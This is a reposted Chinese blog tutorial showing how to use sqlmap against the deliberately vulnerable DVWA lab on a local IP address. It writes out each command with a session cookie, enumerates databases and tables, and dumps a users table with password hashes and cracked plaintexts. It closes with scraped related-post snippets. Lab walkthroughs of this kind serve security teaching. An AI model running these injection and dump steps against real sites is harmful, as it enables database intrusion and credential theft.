2. 程式人生 > >sql註入(轉載)

sql註入(轉載)

阿新 發佈:2018-03-05
data 數據表 並且 system 測試 地址欄 table arch sdn

1、使用firefox瀏覽器(安裝一個firebug插件)登錄http://192.168.204.132/dvwa/login.php頁面,使用admin/password

2、打開firebug工具的cookie面板,將所有cookie復制下來。得到:

PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2; path=/; domain=192.168.204.132
security=low; path=/dvwa/; domain=192.168.204.132

3、打開dvwa的SQL Injection頁面,在User ID輸入框內輸入1,點擊submit按鈕。從地址欄得到要測試的url:

http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

4、從kali打開終端,數據sqlmap,將會有提示文檔。

5、開始測試該url是否存在sql註入漏洞,在終端輸入:

sqlmap -u ‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘ - -cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘

得到信息結果: 

web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.18
back-end DBMS: MySQL >= 5.5

6、開始探測MYSQL中用來存放應用數據的數據庫名稱,在終端輸入:

sqlmap -u ‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘ --cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘ --dbs -v 0

得到信息結果:

available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

7、得到數據庫是dvwa後,開始獲取數據庫中所存在表,在終端輸入:

sqlmap -u ‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘ --cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘ -D dvwa --tables

得到信息結果:

Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

8、得到兩張表,獲取一下users表的字段,在終端輸入:

sqlmap -u ‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘ --cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘ -D dvwa --tables -T users --columns

得到信息結果:

Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

9、最後可以吧表數據導出來了,在終端輸入:

sqlmap -u ‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘ --cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘ -D dvwa --tables -T users --columns --dump

得到信息結果:

Table: users
[5 entries]
+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar                                           | user    | password                                    | last_name | first_name | last_login          | failed_login |
+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | http://127.0.0.1/DVWA/hackable/users/admin.jpg   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2017-04-01 00:58:43 | 0            |
| 2       | http://127.0.0.1/DVWA/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2017-04-01 00:58:43 | 0            |
| 3       | http://127.0.0.1/DVWA/hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2017-04-01 00:58:43 | 0            |
| 4       | http://127.0.0.1/DVWA/hackable/users/pablo.jpg   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2017-04-01 00:58:43 | 0            |
| 5       | http://127.0.0.1/DVWA/hackable/users/smithy.jpg  | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2017-04-01 00:58:43 | 0            |
+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+

[INFO] table ‘dvwa.users‘ dumped to CSV file ‘/root/.sqlmap/output/192.168.204.132/dump/dvwa/users.csv‘

並且導出CSV數據到本地!還發現一個驚喜數,據庫中的密文密碼也給破譯了!!


給出sqlmap的一些選項:(sqlmap -h會給出英文的幫助文檔)
–cookie : 設置我們的cookie值“將DVWA安全等級從high設置為low”
-u : 指定目標URL
-b : 獲取DBMS banner
–current-db : 獲取當前數據庫
–current-user:獲取當前用戶

–string : 當查詢可用時用來匹配頁面中的字符串
–users : 枚舉DBMS用戶
–password : 枚舉DBMS用戶密碼hash

–dbs: 枚舉DBMS中的數據庫

-D : 要枚舉的DBMS數據庫
–tables : 枚舉DBMS數據庫中的數據表

–columns : 枚舉DBMS數據庫表中的所有列

-T : 要枚舉的DBMS數據表

-C: 要枚舉的DBMS數據表中的列

–dump : 轉儲DBMS數據表項

非常感謝原博主的分享,受益頗多:http://blog.csdn.net/qq_20745827/article/details/68953621

sql註入(轉載)

相關推薦

sql轉載

data 數據表 並且 system 測試 地址欄 table arch sdn 1、使用firefox瀏覽器(安裝一個firebug插件)登錄http://192.168.204.132/dvwa/login.php頁面,使用admin/password

DWVA手把手教程(四)——SQLPost

.... color his posit use 就是 讓我 skip 然而 前言 一開始讓我寫Post方法實現Sql註入我是拒絕的 可是無奈之前已經許諾過了 雖然post方法註入相對簡單 但是我還是想在此總結出更多的post註入方法與思路 雖然DWVA中並沒有post註入

手工sql重點

erl 無法 content rom 字符串連接 手工 ace 數字型註入 連接 sql 子查詢:() select goods_name from goods where goods_id=(select max(goods_id) from goods); 聯合查詢:

SQL一般

current csrf 註入 ascii ati cookie ble true () mysql一般註入(二) 1.mysql一般註入(insert、update) mysql一般請求mysql_query不支持多語句執行,mysqli可以。   inse

SQLHTTP頭介紹

unix 連接 代理服務器 connect 詳解 mysql 等待 .com max-age HTTP 頭部詳解(轉自網絡)1、 Accept:告訴 WEB 服務器自己接受什麽介質類型,*/* 表示任何類型,type/* 表示該類型下的所有子類型,type/sub-type

Kali學習筆記40:SQL手工2

set 找到 Suite 雙引號 127.0.0.1 但是 int ava 成功 上一篇講到可以通過註入得到數據庫中所有的表信息 而SQL註入能不能做數據庫之外的事情呢? 讀取文件: ‘ union select null,load_file(‘/etc/passwd

全棧開發者都應該關這些轉載

學習 移動互 top emd ret 知識 讀者 iam 運維   這篇文章推薦了包括技術、設計、極客和創業相關的熱門公眾號。   1、面向對象     「面向對象」一個專門為 IT 單身男女服務的征友相親公眾號。可以發布單身男生和女生相親信息。既

Mysql寬字節

strong com 效果 編碼問題 blog 壓縮 個數 magic sse 盡管現在呼籲所有的程序都使用unicode編碼,所有的網站都使用utf-8編碼,來一個統一的國際規範。但仍然有很多,包括國內及國外(特別是非英語國家)的一些cms,仍然使用著自己國家的一套編碼,

SpringIOC

str out int -i 一個個 mls cst inter isp 簡單來說就是減少層與層之間的耦合關系,本來在service調用dao要new,有了這個就可以通過註入的方式,相當與把所有的new操作都變成了在配置文件中配置,有改動時直接改配置就行了不用一個個java

laravel服務容器-----深入理解控制反轉IoC和依賴DI

outer 十分 綁定 之間 module 還需 true 更多 我們 首先大家想一想什麽是容器,字面意思就是盛放東西的東西,常見的變量,對象屬性都是容器,一個容器能夠裝什麽東西,完全在於你對這個容器的定義。有的容器不僅僅只是存文本,變量,而是對象,屬性,那麽我們通過這種容

PHP控制反轉IOC和依賴DI

-m ret 客戶端 無需 frame 控制 bsp 而是 div 先上一個例子: <?php class A { public $b; public $c; public function __construct() {

Spring重溫(三)--Spring依賴DI

igui 顯式 -a framework 聲明 構造 問題 ram cif 前言:在Spring框架中,DI(依賴註入)是用來定義對象彼此間的依賴,主要有set方法註入和構造器註入兩種方式。另外,當一個類包含多個構造函數帶的參數相同,它總是會造成構造函數註入參數類型歧義的問

【安全牛學習筆記】SQLMAP自動

信息安全 security+ SQLMAP自動註入(二)-REQUEST和SQLMAP自動註入(三)-OPTIMIZATIONSQLMAP自動註入02-----REQUEST--delay 每次http(s)請求之間延遲時間,浮點數,單位為秒,默認無延遲--timeout 請求超時時間,

Java 系列之spring學習--依賴

ssp app odin throw 函數 ans 圖片 .com 配置 一、依賴註入的三種方式   接口註入,set註入,構造函數註入 二、構造函數註入   2.1、測試類 package test; public class test01 { public St

SQL(dvwa環境

esp dvwa 發現 bili .net resp 報錯 rom 字段 首先登錄DVWA主頁: 1、修改安全級別為LOW級(第一次玩別打臉),如圖中DVWA Security頁面中。 2、進入SQL Injection頁面,出錯了。(心裏想著這DVWA是官網下的不至於玩

SpringBoot攔截器中Bean無法

然而 BE 技術分享 查詢 load oschina pac 原因 註解 這兩天遇到SpringBoot攔截器中Bean無法註入問題。下面介紹我的思考過程和解決過程: 1.由於其他bean在service,controller層註入一點問題也沒有,開始根本沒意識到Bean無

輕松了解Spring中的控制反轉和依賴

xml文件 span 做到 添加 resource exce http 實的 name 原文轉自:https://www.cnblogs.com/xxzhuang/p/5948902.html   我們回顧一下計算機的發展史,從最初第一臺計算機的占地面積達170平方米,重達

04 Spring框架 依賴

ride sts 版權 div () 序號 哪些 成功 computer 上一節我們講了幾個bean的一些屬性,用來限制我們實例創建過後的狀態。 但是細心的我們會發現其實上面demo創建的實例並不完整,對象創建出來過後只有一個方法,而沒有包含其他信息(如屬性)。 之前我

SQL優化理論基礎:MySQL架構總覽、查詢執行流程、SQL解析順序轉載

前言:   一直是想知道一條SQL語句是怎麼被執行的,它執行的順序是怎樣的,然後檢視總結各方資料,就有了下面這一篇博文了。   本文將從MySQL總體架構--->

Oracle系統表整理+常用SQL語句收集轉載

原文:https://www.cnblogs.com/jiangxinnju/p/5840420.html-- DBA/ALL/USER/V_$/GV_$/SESSION/INDEX開頭的絕大部分都是檢視 -- DBA_TABLES意為DBA擁有的或可以訪問的所有的關係表。 -- ALL_TABLES意